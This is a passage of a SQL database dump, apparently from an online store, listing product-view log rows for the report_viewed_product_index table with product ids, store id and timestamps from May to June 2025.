(17074, NULL, NULL, 2062, 1, '2025-05-20 16:52:14'),
(17075, NULL, NULL, 2054, 1, '2025-05-20 17:09:16'),
(17076, NULL, NULL, 2059, 1, '2025-05-20 17:23:57'),
(17077, NULL, NULL, 2064, 1, '2025-05-20 17:27:54'),
(17078, NULL, NULL, 2059, 1, '2025-05-20 21:23:02'),
(17079, NULL, NULL, 2054, 1, '2025-05-20 21:46:12'),
(17080, NULL, NULL, 2061, 1, '2025-05-21 01:15:09'),
(17081, NULL, NULL, 2058, 1, '2025-05-21 01:32:07'),
(17082, NULL, NULL, 2055, 1, '2025-05-21 01:34:48'),
(17083, NULL, NULL, 2055, 1, '2025-05-21 02:48:15'),
(17084, NULL, NULL, 2060, 1, '2025-05-21 06:40:40'),
(17085, NULL, NULL, 2059, 1, '2025-05-21 09:20:07'),
(17086, NULL, NULL, 2064, 1, '2025-05-21 10:14:50'),
(17087, NULL, NULL, 2055, 1, '2025-05-21 11:53:12'),
(17088, NULL, NULL, 2063, 1, '2025-05-21 12:28:12'),
(17089, NULL, NULL, 2062, 1, '2025-05-21 15:21:44'),
(17090, NULL, NULL, 2063, 1, '2025-05-21 21:30:29'),
(17091, NULL, NULL, 2060, 1, '2025-05-21 21:35:00'),
(17092, NULL, NULL, 2058, 1, '2025-05-21 21:35:02'),
(17093, NULL, NULL, 2059, 1, '2025-05-21 21:37:48'),
(17094, NULL, NULL, 2064, 1, '2025-05-21 22:07:29'),
(17095, NULL, NULL, 2061, 1, '2025-05-21 22:33:46'),
(17096, NULL, NULL, 2061, 1, '2025-05-21 22:43:12'),
(17097, NULL, NULL, 2062, 1, '2025-05-21 22:43:16'),
(17098, NULL, NULL, 2063, 1, '2025-05-21 22:43:20'),
(17099, NULL, NULL, 2064, 1, '2025-05-22 07:05:51'),
(17100, NULL, NULL, 2060, 1, '2025-05-22 07:15:32'),
(17101, NULL, NULL, 2062, 1, '2025-05-22 07:45:15'),
(17102, NULL, NULL, 2058, 1, '2025-05-22 08:44:46'),
(17103, NULL, NULL, 2064, 1, '2025-05-22 09:40:24'),
(17104, NULL, NULL, 2061, 1, '2025-05-22 13:02:38'),
(17105, NULL, NULL, 2060, 1, '2025-05-22 13:40:13'),
(17106, NULL, NULL, 2062, 1, '2025-05-22 15:38:33'),
(17107, NULL, NULL, 2054, 1, '2025-05-22 16:11:34'),
(17108, NULL, NULL, 2054, 1, '2025-05-22 16:40:04'),
(17109, NULL, NULL, 2054, 1, '2025-05-22 19:46:19'),
(17110, NULL, NULL, 2061, 1, '2025-05-22 21:26:55'),
(17111, NULL, NULL, 2064, 1, '2025-05-22 22:46:06'),
(17112, NULL, NULL, 2064, 1, '2025-05-23 04:41:07'),
(17113, NULL, NULL, 2059, 1, '2025-05-23 06:36:51'),
(17114, NULL, NULL, 2061, 1, '2025-05-23 07:26:47'),
(17115, NULL, NULL, 2058, 1, '2025-05-23 10:08:49'),
(17116, NULL, NULL, 2062, 1, '2025-05-23 10:49:02'),
(17117, NULL, NULL, 2059, 1, '2025-05-23 12:05:12'),
(17118, NULL, NULL, 2062, 1, '2025-05-23 15:20:47'),
(17119, NULL, NULL, 2059, 1, '2025-05-23 17:43:12'),
(17120, NULL, NULL, 2058, 1, '2025-05-23 19:49:25'),
(17121, NULL, NULL, 2064, 1, '2025-05-23 20:45:01'),
(17122, NULL, NULL, 2063, 1, '2025-05-23 20:57:39'),
(17123, NULL, NULL, 2060, 1, '2025-05-23 21:36:13'),
(17124, NULL, NULL, 2061, 1, '2025-05-23 22:14:50'),
(17125, NULL, NULL, 2061, 1, '2025-05-23 22:35:19'),
(17126, NULL, NULL, 2053, 1, '2025-05-24 01:11:46'),
(17127, NULL, NULL, 2053, 1, '2025-05-24 01:43:49'),
(17128, NULL, NULL, 2058, 1, '2025-05-24 03:59:53'),
(17129, NULL, NULL, 2055, 1, '2025-05-24 04:09:15'),
(17130, NULL, NULL, 2062, 1, '2025-05-24 07:22:56'),
(17131, NULL, NULL, 2062, 1, '2025-05-24 09:32:53'),
(17132, NULL, NULL, 2062, 1, '2025-05-24 10:10:19'),
(17133, NULL, NULL, 2064, 1, '2025-05-24 12:39:15'),
(17134, NULL, NULL, 2062, 1, '2025-05-24 15:28:39'),
(17135, NULL, NULL, 2061, 1, '2025-05-24 15:56:27'),
(17136, NULL, NULL, 2063, 1, '2025-05-25 01:14:17'),
(17137, NULL, NULL, 2054, 1, '2025-05-25 05:58:54'),
(17138, NULL, NULL, 2055, 1, '2025-05-25 05:58:57'),
(17139, NULL, NULL, 2064, 1, '2025-05-25 05:59:07'),
(17140, NULL, NULL, 2063, 1, '2025-05-25 05:59:10'),
(17141, NULL, NULL, 2062, 1, '2025-05-25 05:59:11'),
(17142, NULL, NULL, 2060, 1, '2025-05-25 05:59:16'),
(17143, NULL, NULL, 2059, 1, '2025-05-25 05:59:18'),
(17144, NULL, NULL, 2061, 1, '2025-05-25 05:59:20'),
(17145, NULL, NULL, 2058, 1, '2025-05-25 05:59:25'),
(17146, NULL, NULL, 2062, 1, '2025-05-25 11:37:48'),
(17147, NULL, NULL, 2063, 1, '2025-05-25 11:58:58'),
(17148, NULL, NULL, 2058, 1, '2025-05-25 13:50:10'),
(17149, NULL, NULL, 2062, 1, '2025-05-25 15:28:51'),
(17150, NULL, NULL, 2063, 1, '2025-05-25 18:06:57'),
(17151, NULL, NULL, 2059, 1, '2025-05-25 20:02:19'),
(17152, NULL, NULL, 2059, 1, '2025-05-25 22:12:37'),
(17153, NULL, NULL, 2063, 1, '2025-05-26 00:20:10'),
(17154, NULL, NULL, 2061, 1, '2025-05-26 00:26:14'),
(17155, NULL, NULL, 2064, 1, '2025-05-26 00:35:55'),
(17156, NULL, NULL, 2058, 1, '2025-05-26 00:44:56'),
(17157, NULL, NULL, 2064, 1, '2025-05-26 01:06:48'),
(17158, NULL, NULL, 2059, 1, '2025-05-26 01:30:03'),
(17159, NULL, NULL, 2062, 1, '2025-05-26 06:43:59'),
(17160, NULL, NULL, 2054, 1, '2025-05-26 06:55:18'),
(17161, NULL, NULL, 2059, 1, '2025-05-26 07:15:17'),
(17162, NULL, NULL, 2055, 1, '2025-05-26 07:24:04'),
(17163, NULL, NULL, 2061, 1, '2025-05-26 11:58:32'),
(17164, NULL, NULL, 2061, 1, '2025-05-26 11:58:54'),
(17165, NULL, NULL, 2060, 1, '2025-05-26 12:25:42'),
(17166, NULL, NULL, 2062, 1, '2025-05-26 16:07:30'),
(17167, NULL, NULL, 2058, 1, '2025-05-27 05:51:27'),
(17168, NULL, NULL, 2058, 1, '2025-05-27 07:46:00'),
(17169, NULL, NULL, 2064, 1, '2025-05-27 08:59:59'),
(17170, NULL, NULL, 2059, 1, '2025-05-27 09:06:00'),
(17171, NULL, NULL, 2060, 1, '2025-05-27 11:17:46'),
(17172, NULL, NULL, 2058, 1, '2025-05-27 13:01:46'),
(17173, NULL, NULL, 2061, 1, '2025-05-27 15:17:48'),
(17174, NULL, NULL, 2062, 1, '2025-05-27 16:02:27'),
(17175, NULL, NULL, 2054, 1, '2025-05-27 16:43:17'),
(17176, NULL, NULL, 2059, 1, '2025-05-27 17:33:39'),
(17177, NULL, NULL, 2062, 1, '2025-05-27 19:20:45'),
(17178, NULL, NULL, 2064, 1, '2025-05-27 20:37:49'),
(17179, NULL, NULL, 2054, 1, '2025-05-27 21:39:33'),
(17180, NULL, NULL, 2063, 1, '2025-05-27 22:20:12'),
(17181, NULL, NULL, 2055, 1, '2025-05-27 23:29:22'),
(17182, NULL, NULL, 2058, 1, '2025-05-28 06:23:40'),
(17183, NULL, NULL, 2060, 1, '2025-05-28 06:43:10'),
(17184, NULL, NULL, 2061, 1, '2025-05-28 07:06:23'),
(17185, NULL, NULL, 2055, 1, '2025-05-28 11:36:13'),
(17186, NULL, NULL, 2062, 1, '2025-05-28 14:14:46'),
(17187, NULL, NULL, 2062, 1, '2025-05-28 15:17:18'),
(17188, NULL, NULL, 2061, 1, '2025-05-28 18:19:49'),
(17189, NULL, NULL, 2062, 1, '2025-05-28 19:03:44'),
(17190, NULL, NULL, 2064, 1, '2025-05-28 20:11:58'),
(17191, NULL, NULL, 2063, 1, '2025-05-28 22:37:51'),
(17192, NULL, NULL, 2061, 1, '2025-05-28 22:37:55'),
(17193, NULL, NULL, 2062, 1, '2025-05-28 22:38:04'),
(17194, NULL, NULL, 2064, 1, '2025-05-28 23:43:44'),
(17195, NULL, NULL, 2053, 1, '2025-05-29 01:27:32'),
(17196, NULL, NULL, 2061, 1, '2025-05-29 02:43:25'),
(17197, NULL, NULL, 2058, 1, '2025-05-29 02:51:13'),
(17198, NULL, NULL, 2055, 1, '2025-05-29 03:04:26'),
(17199, NULL, NULL, 2054, 1, '2025-05-29 03:12:17'),
(17200, NULL, NULL, 2064, 1, '2025-05-29 03:21:27'),
(17201, NULL, NULL, 2054, 1, '2025-05-29 03:23:18'),
(17202, NULL, NULL, 2059, 1, '2025-05-29 03:23:29'),
(17203, NULL, NULL, 2061, 1, '2025-05-29 03:23:32'),
(17204, NULL, NULL, 2058, 1, '2025-05-29 03:23:35'),
(17205, NULL, NULL, 2061, 1, '2025-05-29 03:24:40'),
(17206, NULL, NULL, 2059, 1, '2025-05-29 04:21:21'),
(17207, NULL, NULL, 2058, 1, '2025-05-29 06:30:28'),
(17208, NULL, NULL, 2054, 1, '2025-05-29 07:05:52'),
(17209, NULL, NULL, 2055, 1, '2025-05-29 07:17:52'),
(17210, NULL, NULL, 2059, 1, '2025-05-29 07:29:51'),
(17211, NULL, NULL, 2058, 1, '2025-05-29 08:40:24'),
(17212, NULL, NULL, 2060, 1, '2025-05-29 09:56:16'),
(17213, NULL, NULL, 2062, 1, '2025-05-29 10:16:05'),
(17214, NULL, NULL, 2064, 1, '2025-05-29 10:25:19'),
(17215, NULL, NULL, 2063, 1, '2025-05-29 10:35:16'),
(17216, NULL, NULL, 2063, 1, '2025-05-29 11:50:00'),
(17217, NULL, NULL, 2062, 1, '2025-05-29 11:53:07'),
(17218, NULL, NULL, 2060, 1, '2025-05-29 13:45:39'),
(17219, NULL, NULL, 2062, 1, '2025-05-29 15:18:36'),
(17220, NULL, NULL, 2060, 1, '2025-05-29 15:51:33'),
(17221, NULL, NULL, 2064, 1, '2025-05-29 16:03:12'),
(17222, NULL, NULL, 2061, 1, '2025-05-29 17:18:39'),
(17223, NULL, NULL, 2063, 1, '2025-05-29 17:27:29'),
(17224, NULL, NULL, 2054, 1, '2025-05-29 19:36:22'),
(17225, NULL, NULL, 2054, 1, '2025-05-29 21:02:29'),
(17226, NULL, NULL, 2063, 1, '2025-05-29 22:52:17'),
(17227, NULL, NULL, 2058, 1, '2025-05-29 23:15:19'),
(17228, NULL, NULL, 2055, 1, '2025-05-29 23:16:44'),
(17229, NULL, NULL, 2059, 1, '2025-05-29 23:45:19'),
(17230, NULL, NULL, 2055, 1, '2025-05-30 02:32:23'),
(17231, NULL, NULL, 2064, 1, '2025-05-30 04:41:26'),
(17232, NULL, NULL, 2059, 1, '2025-05-30 06:45:55'),
(17233, NULL, NULL, 2062, 1, '2025-05-30 07:24:47'),
(17234, NULL, NULL, 2059, 1, '2025-05-30 08:47:33'),
(17235, NULL, NULL, 2055, 1, '2025-05-30 08:48:13'),
(17236, NULL, NULL, 2054, 1, '2025-05-30 10:15:29'),
(17237, NULL, NULL, 2060, 1, '2025-05-30 11:37:37'),
(17238, NULL, NULL, 2054, 1, '2025-05-30 14:31:47'),
(17239, NULL, NULL, 2062, 1, '2025-05-30 16:10:16'),
(17240, NULL, NULL, 2063, 1, '2025-05-30 16:34:39'),
(17241, NULL, NULL, 2059, 1, '2025-05-30 17:52:30'),
(17242, NULL, NULL, 2058, 1, '2025-05-30 19:46:13'),
(17243, NULL, NULL, 2061, 1, '2025-05-30 22:29:04'),
(17244, NULL, NULL, 2055, 1, '2025-05-30 23:17:38'),
(17245, NULL, NULL, 2058, 1, '2025-05-30 23:17:40'),
(17246, NULL, NULL, 2060, 1, '2025-05-30 23:29:48'),
(17247, NULL, NULL, 2064, 1, '2025-05-30 23:47:48'),
(17248, NULL, NULL, 2062, 1, '2025-05-30 23:48:35'),
(17249, NULL, NULL, 2053, 1, '2025-05-31 01:40:33'),
(17250, NULL, NULL, 2054, 1, '2025-05-31 03:59:38'),
(17251, NULL, NULL, 2054, 1, '2025-05-31 12:30:18'),
(17252, NULL, NULL, 2059, 1, '2025-05-31 12:51:54'),
(17253, NULL, NULL, 2055, 1, '2025-05-31 12:54:27'),
(17254, NULL, NULL, 2062, 1, '2025-05-31 15:18:09'),
(17255, NULL, NULL, 2062, 1, '2025-05-31 20:50:31'),
(17256, NULL, NULL, 2054, 1, '2025-05-31 23:30:22'),
(17257, NULL, NULL, 2055, 1, '2025-05-31 23:30:27'),
(17258, NULL, NULL, 2064, 1, '2025-05-31 23:30:38'),
(17259, NULL, NULL, 2063, 1, '2025-05-31 23:30:42'),
(17260, NULL, NULL, 2062, 1, '2025-05-31 23:30:45'),
(17261, NULL, NULL, 2060, 1, '2025-05-31 23:30:48'),
(17262, NULL, NULL, 2059, 1, '2025-05-31 23:30:50'),
(17263, NULL, NULL, 2061, 1, '2025-05-31 23:30:52'),
(17264, NULL, NULL, 2058, 1, '2025-05-31 23:30:55'),
(17265, NULL, NULL, 2060, 1, '2025-06-01 10:18:18'),
(17266, NULL, NULL, 2059, 1, '2025-06-01 10:22:39'),
(17267, NULL, NULL, 2063, 1, '2025-06-01 10:26:17'),
(17268, NULL, NULL, 2058, 1, '2025-06-01 10:48:08'),
(17269, NULL, NULL, 2055, 1, '2025-06-01 11:27:11'),
(17270, NULL, NULL, 2061, 1, '2025-06-01 12:37:22'),
(17271, NULL, NULL, 2062, 1, '2025-06-01 13:21:04'),
(17272, NULL, NULL, 2054, 1, '2025-06-01 14:41:40'),
(17273, NULL, NULL, 2059, 1, '2025-06-01 14:55:53'),
(17274, NULL, NULL, 2064, 1, '2025-06-01 15:07:25'),
(17275, NULL, NULL, 2062, 1, '2025-06-01 15:31:06'),
(17276, NULL, NULL, 2064, 1, '2025-06-01 23:53:13'),
(17277, NULL, NULL, 2059, 1, '2025-06-02 02:21:19'),
(17278, NULL, NULL, 2060, 1, '2025-06-02 02:24:45'),
(17279, NULL, NULL, 2061, 1, '2025-06-02 03:00:00'),
(17280, NULL, NULL, 2062, 1, '2025-06-02 05:20:41'),
(17281, NULL, NULL, 2063, 1, '2025-06-02 05:47:08'),
(17282, NULL, NULL, 2063, 1, '2025-06-02 07:31:29'),
(17283, NULL, NULL, 2062, 1, '2025-06-02 07:52:45'),
(17284, NULL, NULL, 2055, 1, '2025-06-02 09:39:49'),
(17285, NULL, NULL, 2064, 1, '2025-06-02 10:40:12'),
(17286, NULL, NULL, 2059, 1, '2025-06-02 12:06:32'),
(17287, NULL, NULL, 2062, 1, '2025-06-02 15:35:27'),
(17288, NULL, NULL, 2060, 1, '2025-06-02 18:17:04'),
(17289, NULL, NULL, 2063, 1, '2025-06-02 18:49:48'),
(17290, NULL, NULL, 2064, 1, '2025-06-02 19:09:12'),
(17291, NULL, NULL, 2063, 1, '2025-06-02 19:13:47'),
(17292, NULL, NULL, 2061, 1, '2025-06-02 20:38:36'),
(17293, NULL, NULL, 2061, 1, '2025-06-02 22:07:04'),
(17294, NULL, NULL, 2058, 1, '2025-06-02 22:15:21'),
(17295, NULL, NULL, 2064, 1, '2025-06-02 23:02:15'),
(17296, NULL, NULL, 2061, 1, '2025-06-03 00:13:09'),
(17297, NULL, NULL, 2061, 1, '2025-06-03 00:43:19'),
(17298, NULL, NULL, 2058, 1, '2025-06-03 00:53:04'),
(17299, NULL, NULL, 2058, 1, '2025-06-03 00:56:52'),
(17300, NULL, NULL, 2055, 1, '2025-06-03 01:00:19'),
(17301, NULL, NULL, 2054, 1, '2025-06-03 01:12:01'),
(17302, NULL, NULL, 2061, 1, '2025-06-03 01:19:09'),
(17303, NULL, NULL, 2060, 1, '2025-06-03 01:33:09'),
(17304, NULL, NULL, 2054, 1, '2025-06-03 02:11:49'),
(17305, NULL, NULL, 2055, 1, '2025-06-03 02:47:30'),
(17306, NULL, NULL, 2064, 1, '2025-06-03 02:47:38'),
(17307, NULL, NULL, 2061, 1, '2025-06-03 02:47:46'),
(17308, NULL, NULL, 2058, 1, '2025-06-03 02:47:57'),
(17309, NULL, NULL, 2064, 1, '2025-06-03 02:59:46'),
(17310, NULL, NULL, 2059, 1, '2025-06-03 03:50:32'),
(17311, NULL, NULL, 2062, 1, '2025-06-03 04:00:16'),
(17312, NULL, NULL, 2064, 1, '2025-06-03 09:37:19'),
(17313, NULL, NULL, 2062, 1, '2025-06-03 15:18:25'),
(17314, NULL, NULL, 2060, 1, '2025-06-03 16:53:49'),
(17315, NULL, NULL, 2054, 1, '2025-06-03 21:48:41'),
(17316, NULL, NULL, 2061, 1, '2025-06-03 22:10:04'),
(17317, NULL, NULL, 2061, 1, '2025-06-04 00:09:57'),
(17318, NULL, NULL, 2063, 1, '2025-06-04 00:10:04'),
(17319, NULL, NULL, 2062, 1, '2025-06-04 00:10:08'),
(17320, NULL, NULL, 2054, 1, '2025-06-04 00:49:34'),
(17321, NULL, NULL, 2060, 1, '2025-06-04 07:03:01'),
(17322, NULL, NULL, 2055, 1, '2025-06-04 11:57:45'),
(17323, NULL, NULL, 2062, 1, '2025-06-04 15:51:16'),
(17324, NULL, NULL, 2064, 1, '2025-06-04 16:35:57'),
(17325, NULL, NULL, 2053, 1, '2025-06-04 18:35:56'),
(17326, NULL, NULL, 2060, 1, '2025-06-05 01:32:31'),
(17327, NULL, NULL, 2062, 1, '2025-06-05 01:33:24'),
(17328, NULL, NULL, 2059, 1, '2025-06-05 01:33:29'),
(17329, NULL, NULL, 2063, 1, '2025-06-05 01:33:32'),
(17330, NULL, NULL, 2061, 1, '2025-06-05 01:33:35'),
(17331, NULL, NULL, 2053, 1, '2025-06-05 01:34:33'),
(17332, NULL, NULL, 2053, 1, '2025-06-05 01:35:02'),
(17333, NULL, NULL, 2058, 1, '2025-06-05 01:35:07'),
(17334, NULL, NULL, 2055, 1, '2025-06-05 01:35:13'),
(17335, NULL, NULL, 2054, 1, '2025-06-05 01:35:16'),
(17336, NULL, NULL, 2053, 1, '2025-06-05 01:36:23'),
(17337, NULL, NULL, 2064, 1, '2025-06-05 01:36:40'),
(17338, NULL, NULL, 2062, 1, '2025-06-05 01:36:46'),
(17339, NULL, NULL, 2060, 1, '2025-06-05 01:37:04'),
(17340, NULL, NULL, 2064, 1, '2025-06-05 01:37:11'),
(17341, NULL, NULL, 2054, 1, '2025-06-05 01:37:35'),
(17342, NULL, NULL, 2055, 1, '2025-06-05 01:37:40'),
(17343, NULL, NULL, 2064, 1, '2025-06-05 01:37:48'),
(17344, NULL, NULL, 2063, 1, '2025-06-05 01:37:51'),
(17345, NULL, NULL, 2059, 1, '2025-06-05 01:37:54'),
(17346, NULL, NULL, 2058, 1, '2025-06-05 01:37:57'),
(17347, NULL, NULL, 2061, 1, '2025-06-05 01:37:59'),
(17348, NULL, NULL, 2064, 1, '2025-06-05 06:56:08'),
(17349, NULL, NULL, 2058, 1, '2025-06-05 08:46:11'),
(17350, NULL, NULL, 2059, 1, '2025-06-05 09:56:16'),
(17351, NULL, NULL, 2060, 1, '2025-06-05 14:53:13'),
(17352, NULL, NULL, 2062, 1, '2025-06-05 15:26:57'),
(17353, NULL, NULL, 2054, 1, '2025-06-05 19:46:22'),
(17354, NULL, NULL, 2059, 1, '2025-06-06 06:39:24'),
(17355, NULL, NULL, 2062, 1, '2025-06-06 06:48:08'),
(17356, NULL, NULL, 2060, 1, '2025-06-06 14:59:43'),
(17357, NULL, NULL, 2062, 1, '2025-06-06 16:05:58'),
(17358, NULL, NULL, 2059, 1, '2025-06-06 16:06:36'),
(17359, NULL, NULL, 2059, 1, '2025-06-06 16:10:01'),
(17360, NULL, NULL, 2054, 1, '2025-06-06 17:08:19'),
(17361, NULL, NULL, 2059, 1, '2025-06-06 17:38:44'),
(17362, NULL, NULL, 2062, 1, '2025-06-06 18:43:35'),
(17363, NULL, NULL, 2058, 1, '2025-06-06 19:47:45'),
(17364, NULL, NULL, 2059, 1, '2025-06-06 22:59:38'),
(17365, NULL, NULL, 2053, 1, '2025-06-07 01:45:55'),
(17366, NULL, NULL, 2054, 1, '2025-06-07 02:10:08'),
(17367, NULL, NULL, 2059, 1, '2025-06-07 03:26:49'),
(17368, NULL, NULL, 2061, 1, '2025-06-07 06:22:05'),
(17369, NULL, NULL, 2064, 1, '2025-06-07 09:31:11'),
(17370, NULL, NULL, 2062, 1, '2025-06-07 15:29:42'),
(17371, NULL, NULL, 2062, 1, '2025-06-07 16:49:35'),
(17372, NULL, NULL, 2063, 1, '2025-06-07 17:52:04'),
(17373, NULL, NULL, 2055, 1, '2025-06-07 19:00:27'),
(17374, NULL, NULL, 2064, 1, '2025-06-07 20:19:35'),
(17375, NULL, NULL, 2059, 1, '2025-06-07 20:27:24'),
(17376, NULL, NULL, 2060, 1, '2025-06-07 20:48:07'),
(17377, NULL, NULL, 2053, 1, '2025-06-07 21:36:20'),
(17378, NULL, NULL, 2064, 1, '2025-06-08 04:28:51'),
(17379, NULL, NULL, 2063, 1, '2025-06-08 04:40:55'),
(17380, NULL, NULL, 2064, 1, '2025-06-08 04:43:24'),
(17381, NULL, NULL, 2061, 1, '2025-06-08 04:50:09'),
(17382, NULL, NULL, 2061, 1, '2025-06-08 05:01:21'),
(17383, NULL, NULL, 2058, 1, '2025-06-08 05:09:40'),
(17384, NULL, NULL, 2060, 1, '2025-06-08 05:14:39'),
(17385, NULL, NULL, 2055, 1, '2025-06-08 05:18:40'),
(17386, NULL, NULL, 2064, 1, '2025-06-08 05:26:08'),
(17387, NULL, NULL, 2062, 1, '2025-06-08 05:28:42'),
(17388, NULL, NULL, 2054, 1, '2025-06-08 06:30:16'),
(17389, NULL, NULL, 2064, 1, '2025-06-08 08:38:36'),
(17390, NULL, NULL, 2055, 1, '2025-06-08 09:35:07'),
(17391, NULL, NULL, 2054, 1, '2025-06-08 13:01:30'),
(17392, NULL, NULL, 2058, 1, '2025-06-08 13:58:13'),
(17393, NULL, NULL, 2059, 1, '2025-06-08 14:25:22'),
(17394, NULL, NULL, 2062, 1, '2025-06-08 15:40:51'),
(17395, NULL, NULL, 2055, 1, '2025-06-08 16:16:14'),
(17396, NULL, NULL, 2061, 1, '2025-06-08 16:41:36'),
(17397, NULL, NULL, 2059, 1, '2025-06-08 23:46:00'),
(17398, NULL, NULL, 2061, 1, '2025-06-09 03:24:00'),
(17399, NULL, NULL, 2058, 1, '2025-06-09 05:31:56'),
(17400, NULL, NULL, 2053, 1, '2025-06-09 08:02:08'),
(17401, NULL, NULL, 2061, 1, '2025-06-09 08:36:04'),
(17402, NULL, NULL, 2059, 1, '2025-06-09 08:40:53'),
(17403, NULL, NULL, 2062, 1, '2025-06-09 10:12:04'),
(17404, NULL, NULL, 2063, 1, '2025-06-09 12:15:14'),
(17405, NULL, NULL, 2062, 1, '2025-06-09 15:31:16'),
(17406, NULL, NULL, 2064, 1, '2025-06-09 18:09:28'),
(17407, NULL, NULL, 2063, 1, '2025-06-09 18:51:50'),
(17408, NULL, NULL, 2061, 1, '2025-06-09 20:44:08'),
(17409, NULL, NULL, 2064, 1, '2025-06-10 02:14:31'),
(17410, NULL, NULL, 2064, 1, '2025-06-10 04:40:37'),
(17411, NULL, NULL, 2062, 1, '2025-06-10 04:41:42'),
(17412, NULL, NULL, 2063, 1, '2025-06-10 04:42:16'),
(17413, NULL, NULL, 2061, 1, '2025-06-10 04:42:21'),
(17414, NULL, NULL, 2059, 1, '2025-06-10 04:42:27'),
(17415, NULL, NULL, 2058, 1, '2025-06-10 04:42:33'),
(17416, NULL, NULL, 2055, 1, '2025-06-10 04:42:39'),
(17417, NULL, NULL, 2054, 1, '2025-06-10 04:42:44'),
(17418, NULL, NULL, 2060, 1, '2025-06-10 04:42:50'),
(17419, NULL, NULL, 2061, 1, '2025-06-10 07:55:35'),
(17420, NULL, NULL, 2054, 1, '2025-06-10 09:10:43'),
(17421, NULL, NULL, 2064, 1, '2025-06-10 09:10:48'),
(17422, NULL, NULL, 2062, 1, '2025-06-10 09:13:31'),
(17423, NULL, NULL, 2061, 1, '2025-06-10 09:13:48'),
(17424, NULL, NULL, 2063, 1, '2025-06-10 09:14:05'),
(17425, NULL, NULL, 2059, 1, '2025-06-10 09:14:37'),
(17426, NULL, NULL, 2058, 1, '2025-06-10 09:14:54'),
(17427, NULL, NULL, 2055, 1, '2025-06-10 09:15:10'),
(17428, NULL, NULL, 2054, 1, '2025-06-10 09:15:27'),
(17429, NULL, NULL, 2060, 1, '2025-06-10 09:16:00'),
(17430, NULL, NULL, 2061, 1, '2025-06-10 09:54:18'),
(17431, NULL, NULL, 2062, 1, '2025-06-10 15:34:06'),
(17432, NULL, NULL, 2061, 1, '2025-06-10 17:16:16'),
(17433, NULL, NULL, 2063, 1, '2025-06-10 17:35:56'),
(17434, NULL, NULL, 2063, 1, '2025-06-10 20:29:29'),
(17435, NULL, NULL, 2054, 1, '2025-06-10 21:43:54'),
(17436, NULL, NULL, 2055, 1, '2025-06-10 21:58:38'),
(17437, NULL, NULL, 2063, 1, '2025-06-10 22:41:10'),
(17438, NULL, NULL, 2061, 1, '2025-06-10 22:41:14'),
(17439, NULL, NULL, 2062, 1, '2025-06-10 22:41:22'),
(17440, NULL, NULL, 2062, 1, '2025-06-11 02:49:40'),
(17441, NULL, NULL, 2061, 1, '2025-06-11 03:01:16'),
(17442, NULL, NULL, 2054, 1, '2025-06-11 05:05:09'),
(17443, NULL, NULL, 2060, 1, '2025-06-11 06:47:34'),
(17444, NULL, NULL, 2061, 1, '2025-06-11 07:10:29'),
(17445, NULL, NULL, 2055, 1, '2025-06-11 11:40:29'),
(17446, NULL, NULL, 2058, 1, '2025-06-11 12:12:53'),
(17447, NULL, NULL, 2055, 1, '2025-06-11 13:20:27'),
(17448, NULL, NULL, 2062, 1, '2025-06-11 15:35:10'),
(17449, NULL, NULL, 2064, 1, '2025-06-12 04:49:49'),
(17450, NULL, NULL, 2064, 1, '2025-06-12 06:03:51'),
(17451, NULL, NULL, 2058, 1, '2025-06-12 08:46:12'),
(17452, NULL, NULL, 2060, 1, '2025-06-12 09:59:15'),
(17453, NULL, NULL, 2060, 1, '2025-06-12 13:51:57'),
(17454, NULL, NULL, 2064, 1, '2025-06-12 14:17:46'),
(17455, NULL, NULL, 2062, 1, '2025-06-12 15:46:17'),
(17456, NULL, NULL, 2058, 1, '2025-06-12 17:11:51'),
(17457, NULL, NULL, 2064, 1, '2025-06-12 17:19:15'),
(17458, NULL, NULL, 2059, 1, '2025-06-12 17:26:30'),
(17459, NULL, NULL, 2064, 1, '2025-06-12 18:09:58'),
(17460, NULL, NULL, 2060, 1, '2025-06-12 19:05:46'),
(17461, NULL, NULL, 2058, 1, '2025-06-12 21:20:36'),
(17462, NULL, NULL, 2054, 1, '2025-06-12 21:20:40'),
(17463, NULL, NULL, 2064, 1, '2025-06-13 01:42:25'),
(17464, NULL, NULL, 2061, 1, '2025-06-13 01:50:04'),
(17465, NULL, NULL, 2058, 1, '2025-06-13 02:01:45'),
(17466, NULL, NULL, 2055, 1, '2025-06-13 02:12:34'),
(17467, NULL, NULL, 2054, 1, '2025-06-13 02:21:12'),
(17468, NULL, NULL, 2062, 1, '2025-06-13 02:31:04'),
(17469, NULL, NULL, 2058, 1, '2025-06-13 03:36:19'),
(17470, NULL, NULL, 2059, 1, '2025-06-13 06:46:41'),
(17471, NULL, NULL, 2062, 1, '2025-06-13 07:58:36'),
(17472, NULL, NULL, 2063, 1, '2025-06-13 09:14:37'),
(17473, NULL, NULL, 2063, 1, '2025-06-13 10:05:02'),
(17474, NULL, NULL, 2064, 1, '2025-06-13 12:45:19'),
(17475, NULL, NULL, 2062, 1, '2025-06-13 15:43:52'),
(17476, NULL, NULL, 2064, 1, '2025-06-13 16:12:53'),
(17477, NULL, NULL, 2059, 1, '2025-06-13 17:38:01'),
(17478, NULL, NULL, 2053, 1, '2025-06-14 01:51:59');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(17479, NULL, NULL, 2058, 1, '2025-06-14 02:21:27'),
(17480, NULL, NULL, 2062, 1, '2025-06-14 08:46:24'),
(17481, NULL, NULL, 2059, 1, '2025-06-14 12:02:37'),
(17482, NULL, NULL, 2058, 1, '2025-06-14 12:02:42'),
(17483, NULL, NULL, 2062, 1, '2025-06-14 12:02:43'),
(17484, NULL, NULL, 2061, 1, '2025-06-14 12:02:44'),
(17485, NULL, NULL, 2063, 1, '2025-06-14 12:02:45'),
(17486, NULL, NULL, 2055, 1, '2025-06-14 12:02:47'),
(17487, NULL, NULL, 2054, 1, '2025-06-14 12:02:49'),
(17488, NULL, NULL, 2060, 1, '2025-06-14 12:02:52'),
(17489, NULL, NULL, 2064, 1, '2025-06-14 12:02:54'),
(17490, NULL, NULL, 2062, 1, '2025-06-14 13:31:56'),
(17491, NULL, NULL, 2062, 1, '2025-06-14 14:16:40'),
(17492, NULL, NULL, 2062, 1, '2025-06-15 00:52:30'),
(17493, NULL, NULL, 2054, 1, '2025-06-15 01:59:06'),
(17494, NULL, NULL, 2063, 1, '2025-06-15 03:09:11'),
(17495, NULL, NULL, 2058, 1, '2025-06-15 09:18:33'),
(17496, NULL, NULL, 2053, 1, '2025-06-15 12:16:40'),
(17497, NULL, NULL, 2064, 1, '2025-06-15 13:20:46'),
(17498, NULL, NULL, 2064, 1, '2025-06-15 14:00:41'),
(17499, NULL, NULL, 2062, 1, '2025-06-15 15:04:39'),
